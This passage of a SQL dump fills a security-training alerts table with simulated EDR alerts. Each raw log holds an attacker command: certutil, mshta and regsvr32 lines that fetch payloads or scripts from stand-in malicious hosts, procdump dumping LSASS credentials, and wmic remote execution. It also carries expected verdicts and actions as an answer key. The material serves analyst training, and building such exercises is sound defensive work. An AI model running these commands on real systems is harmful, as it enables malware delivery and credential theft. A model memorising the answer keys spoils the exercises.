Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of certutil.exe for downloading malware payloads is a known tactic\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP and use of certutil.exe to download a payload indicates a data exfiltration attempt.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2082, 'Suspicious Execution of MSHTA for Script Execution', 'high', 'CrowdStrike', 'Detected the use of mshta.exe to execute a remote script. This is often used in fileless attacks and could indicate malicious activity.', 'Malware', 'T1218.005', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:03Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.0.150\",\"dst_ip\":\"192.168.0.151\",\"username\":\"user123\",\"hostname\":\"DESKTOP-ABCD\",\"command_line\":\"mshta.exe http://malicious-site.com/script.hta\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://malicious-site.com/script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malicious activities, often used in phishing attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of mshta.exe to execute remote scripts is a well-known tactic for executing malicious code.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2083, 'PowerShell Fileless Malware Detected via Encoded Command', 'critical', 'CrowdStrike', 'A PowerShell script with encoded commands was executed on the host, indicative of a fileless malware attack. The command was used to download and execute malicious payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN10-02\",\"command_line\":\"powershell.exe -NoP -NonI -W Hidden -Enc W3JpY2tvbGV0IGNvbW1hbmQuZXhl\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoP -NonI -W Hidden -Enc W3JpY2tvbGV0IGNvbW1hbmQuZXhl\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command often used in fileless malware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was used to execute a fileless malware attack, which is a known method to evade detection.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2084, 'Credential Dumping Detected via LSASS Access', 'critical', 'SentinelOne', 'Suspicious access to LSASS memory detected, indicating potential credential dumping activity. This is often a precursor to lateral movement.', 'Credential_Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"CORP-SRV01\",\"command_line\":\"procdump.exe -ma lsass.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump.exe -ma lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Procdump used to extract credentials from LSASS memory\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Procdump was used to access LSASS, which is a common technique for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2085, 'Lateral Movement Detected via WMI Execution', 'high', 'Carbon Black', 'WMI was used to execute commands on a remote host, suggesting lateral movement activity within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.25\",\"username\":\"analyst\",\"hostname\":\"CORP-ADMIN01\",\"command_line\":\"wmic /node:192.168.1.25 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.25 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI used for lateral movement within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI to execute commands on another system is indicative of lateral movement tactics.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2086, 'Suspicious Use of Certutil for Data Exfiltration', 'high', 'Sysmon', 'Certutil was used to encode and potentially exfiltrate data, a common method used by attackers to bypass security controls.', 'Data_Exfiltration', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.16\",\"dst_ip\":\"\",\"username\":\"tuser\",\"hostname\":\"CORP-LAPTOP01\",\"command_line\":\"certutil -encode data.txt encoded_data.txt\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil -encode data.txt encoded_data.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Certutil used for encoding data, potentially for exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.16\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Certutil is often used by attackers to encode and exfiltrate data without detection.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2087, 'Regsvr32 Execution of Malicious Script', 'high', 'CrowdStrike', 'Regsvr32 was used to execute a remote script, a known technique for bypassing application whitelisting defenses.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"\",\"username\":\"hacker\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"regsvr32 /s /n /u /i:https://malicious.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32 /s /n /u /i:https://malicious.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Malicious script hosted at the URL executed using regsvr32\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious.com/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Malicious script hosted at this URL\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Use of regsvr32 to execute remote scripts is a known method for evading detection and executing malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2088, 'Credential Dumping Detected via LSASS Memory Access', 'critical', 'CrowdStrike', 'A suspicious process was detected accessing LSASS memory, indicating a potential credential dumping attempt. The attack originated from an internal system using PowerShell with encoded commands.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc SQBFAFgAQwBTAEEAbABsAGUAbQB1AE4ARQByAEkAdwBTAEEAbABlAG0A\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in credential attack\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc SQBFAFgAQwBTAEEAbABsAGUAbQB1AE4ARQByAEkAdwBTAEEAbABlAG0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The PowerShell command was encoded and aimed at accessing LSASS, a common technique for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2089, 'Lateral Movement Detected via WMI Execution', 'high', 'Carbon Black', 'Suspicious WMI command execution detected originating from a compromised internal host, indicating lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T21:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.30\",\"dst_ip\":\"10.0.2.45\",\"username\":\"network_admin\",\"hostname\":\"CORP-WORKSTATION15\",\"command_line\":\"wmic /node:10.0.2.45 process call create \'cmd /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address initiating WMI command\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.45 process call create \'cmd /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"WMI command used for lateral movement detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI execution from one internal host to another is indicative of lateral movement attempts.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2090, 'Fileless Malware via Encoded PowerShell Command', 'critical', 'SentinelOne', 'A fileless malware attack was detected involving an encoded PowerShell command. The attack was aimed at downloading and executing malicious scripts.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:17:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"user01\",\"hostname\":\"CORP-LAPTOP07\",\"command_line\":\"powershell.exe -enc YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIABzAGgAZQBsAGwALgBlAHgA\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIABzAGgAZQBsAGwALgBlAHgA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for fileless attack\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell script suggests fileless malware tactics aimed at stealthy execution.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2091, 'Suspicious Certutil Activity Detected', 'high', 'Sysmon', 'A suspicious invocation of Certutil was detected, potentially used to download a malicious payload from an external server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.22\",\"dst_ip\":\"104.248.123.45\",\"username\":\"guest_user\",\"hostname\":\"CORP-DESKTOP12\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-domain.com/payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address using Certutil for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-domain.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious payload\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was used in a non-standard way to download files, suggesting misuse for malicious purposes.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2092, 'Regsvr32 Executed with Remote Script', 'high', 'CrowdStrike', 'Detected regsvr32 executing a remote script, a common technique for fileless malware execution. The script was hosted on an external IP.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.50\",\"dst_ip\":\"198.51.100.77\",\"username\":\"developer_user\",\"hostname\":\"CORP-SERVER02\",\"command_line\":\"regsvr32.exe /s /u /i:http://dangerous-site.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.4.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP executing regsvr32 with external script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://dangerous-site.com/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to execute remote script, typical in fileless attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 was used to execute a script from a remote source, a known fileless malware technique.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2093, 'Suspicious PowerShell Encoded Command Execution Detected', 'critical', 'CrowdStrike', 'A fileless malware attack leveraging PowerShell with encoded commands was detected. The attack was attempting credential dumping from LSASS on an internal server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"powershell.exe -enc W1Rlc3RdIHdoaWxlIElFbmNvZGVkQ29tbWFuZA==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc W1Rlc3RdIHdoaWxlIElFbmNvZGVkQ29tbWFuZA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command was encoded, a common tactic used in fileless malware attacks to evade detection.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2094, 'Credential Dumping via LOLBin Detected on Internal Network', 'high', 'SentinelOne', 'Credential dumping from LSASS was attempted using regsvr32, a known LOLBin technique, indicating potential lateral movement.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"10.0.1.25\",\"username\":\"sysadmin\",\"hostname\":\"workstation03\",\"command_line\":\"regsvr32.exe /s /u /n /i:cmd.exe scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the attack\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /n /i:cmd.exe scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Use of regsvr32 to execute scripts, indicative of credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of regsvr32 with cmd.exe indicates an attempt to bypass security controls for credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2095, 'WMI Lateral Movement Detected Across Domain', 'high', 'Carbon Black', 'An attacker used WMI for lateral movement within the network, targeting multiple devices to execute remote commands.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.5\",\"dst_ip\":\"10.0.2.35\",\"username\":\"network_admin\",\"hostname\":\"central_server\",\"command_line\":\"wmic /node:10.0.2.35 process call create \'cmd.exe /c whoami\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP used for internal lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.2.35 process call create \'cmd.exe /c whoami\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command execution used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI was used to execute commands on a remote host, indicating lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2096, 'Certutil Abuse for Malicious Payload Download Detected', 'critical', 'Sysmon', 'Certutil was used to download a malicious payload from an external source, likely for establishing persistence or further compromise.', 'Malware', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:47:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.8\",\"dst_ip\":\"198.51.100.25\",\"username\":\"user_john\",\"hostname\":\"client02\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-site.com/payload.exe payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-site.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Certutil abuse for downloading malicious files\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil was leveraged to download a known malicious payload, indicating an attempt to bypass security measures.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2097, 'MSHTA Exploitation for Remote Code Execution Identified', 'high', 'CrowdStrike', 'MSHTA was used to execute a remote script, which can be indicative of an attempt to execute code or download additional malicious payloads.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.1\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"laptop01\",\"command_line\":\"mshta http://exploit-site.com/exploit.html\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP linked to known malicious activity and exploit distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta http://exploit-site.com/exploit.html\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"MSHTA used to execute remote code, common in fileless malware attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"MSHTA is often used in fileless attacks to execute scripts from remote sources, posing a high security risk.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2098, 'Fileless Malware Detected via PowerShell Encoded Command', 'critical', 'CrowdStrike', 'A fileless malware attack was detected using an encoded PowerShell command executed on a compromised host. The attacker attempted to dump credentials from LSASS.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -enc W3BhdGggdG8gc3VjY2Vzcw==\",\"file_hash\":\"7d1f3b4b7f5d4c3b8d3f2e5a6f7b8c9d\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc W3BhdGggdG8gc3VjY2Vzcw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7d1f3b4b7f5d4c3b8d3f2e5a6f7b8c9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests a fileless malware attack aimed at credential dumping.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2099, 'Suspicious Lateral Movement via WMI Execution', 'high', 'SentinelOne', 'Detected WMI execution from one internal host to another, indicating potential lateral movement. The command was executed without a legitimate business need.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"wmic /node:192.168.1.20 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source internal IP of WMI execution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination internal IP of WMI execution.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.20 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Indicates potential lateral movement activity.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unusual WMI activity suggests an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2100, 'Credential Dumping Detected from LSASS Process', 'critical', 'Carbon Black', 'A process attempting to access LSASS memory was detected, indicative of credential dumping activity.', 'Credential Dumping', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"\",\"username\":\"svc_account\",\"hostname\":\"WORKSTATION-05\",\"command_line\":\"procdump64.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"procdump64.exe -ma lsass.exe C:\\\\temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Procdump used for credential dumping detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of procdump to dump LSASS memory is a clear indicator of 